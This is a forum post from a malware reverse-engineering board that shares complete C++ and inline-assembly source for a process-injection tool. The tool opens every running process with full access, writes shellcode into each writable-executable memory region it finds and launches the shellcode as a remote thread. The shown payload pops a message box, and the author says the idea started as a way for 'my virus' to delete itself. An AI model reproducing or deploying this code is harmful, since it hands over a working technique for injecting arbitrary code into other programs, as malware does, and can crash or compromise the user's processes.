Jump to content
View in the app

A better way to browse. Learn more.
Tuts 4 You

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Cuckoo's Egg (proc injection)

JMC31337
JMC31337
in Malware Reverse Engineering

Featured Replies

Posted

call it cuckoo's egg because a Cuckoo bird is a parasite that lays its eggs in other birds' nests :dunno:

(got started on this idea in order to self delete my virus)

searches through all processes and inject a remote thread spawning a messagebox in every mem location with RWX

combined and modded up code from rwx-hunter.cpp and https://www.cnblogs.com/LyShark/p/13707084.html

  

#include <windows.h>
#include <iostream>
#include <psapi.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <conio.h>


unsigned char shell2[] = "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\xB9\xFF\xFF\xFF\xFF\xFF\xD1\xC3";
  //pusha
  //push 0
  //push 0
  //push 0
  //push 0
  //call ecx
  //popa
  //ret
  
  
VOID ScanProcs(HANDLE hProc)
{

	SIZE_T stSize = 0;
	PBYTE pAdd = (PBYTE)0;
	SYSTEM_INFO si;
	MEMORY_BASIC_INFORMATION mbi = { 0 };
	ZeroMemory(&si,sizeof(SYSTEM_INFO));
	GetSystemInfo(&si);
	pAdd = (PBYTE)si.lpMinimumApplicationAddress;
	
	printf("-----------------------------------------\n");
	
	while (pAdd < (PBYTE)si.lpMaximumApplicationAddress)
	{
		ZeroMemory(&mbi,sizeof(MEMORY_BASIC_INFORMATION));
		stSize = VirtualQueryEx(hProc, pAdd, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
	
		if (stSize == 0)
		{
			pAdd += si.dwPageSize;
			continue;
		}
		
		if (mbi.Protect & PAGE_EXECUTE_READWRITE)
		{
			printf("BaseAddress:0x%08X \t\n", mbi.BaseAddress);
			printf("RWE!!!!\n");
			WriteProcessMemory(hProc, mbi.BaseAddress, shell2, sizeof(shell2), NULL);
			CreateRemoteThread(hProc,NULL,NULL,(LPTHREAD_START_ROUTINE)mbi.BaseAddress,mbi.BaseAddress,NULL,NULL);
		}
		
		if (mbi.Protect & PAGE_EXECUTE_WRITECOPY)
		{
			printf("BaseAddress:0x%08X \t\n", mbi.BaseAddress);
			printf("EWCOPY!!!!\n");
			WriteProcessMemory(hProc, mbi.BaseAddress, shell2, sizeof(shell2), NULL);
			CreateRemoteThread(hProc, NULL, NULL,(LPTHREAD_START_ROUTINE)mbi.BaseAddress,mbi.BaseAddress,NULL,NULL);
		}
		
		pAdd = (PBYTE)mbi.BaseAddress + mbi.RegionSize;
	}
}



int main()
{
	getchar();

	HMODULE user32 = LoadLibraryA("user32.dll");
	VOID* mbox = GetProcAddress(user32, "MessageBoxA");
	DWORD x = (DWORD)mbox;
	DWORD y = (DWORD)shell2;

	_asm
	{
	
		//int 3
		pusha
		mov eax,x
		mov ecx,y 
		add ecx,0x09
		mov [ecx],eax
		popa
	
	}

	printf("add:%x",(DWORD)mbox);
	//getchar();

	HANDLE hProc;
	HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
	PROCESSENTRY32 pe32 = {};
	pe32.dwSize = sizeof(PROCESSENTRY32);
	DWORD bw = 0;
	Process32First(snap,&pe32);

	while (Process32Next(snap,&pe32))
	{
		
		hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
		if (hProc)
		{

			std::wcout << pe32.szExeFile << " Run it? \n";

			//int i = _getch();
			//if (i == '1')
			//{
				ScanProcs(hProc);
				//getchar();
			//}
		
		}
	
	}
	return 0;

}

 

Create an account or sign in to comment

Go to topic listing

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.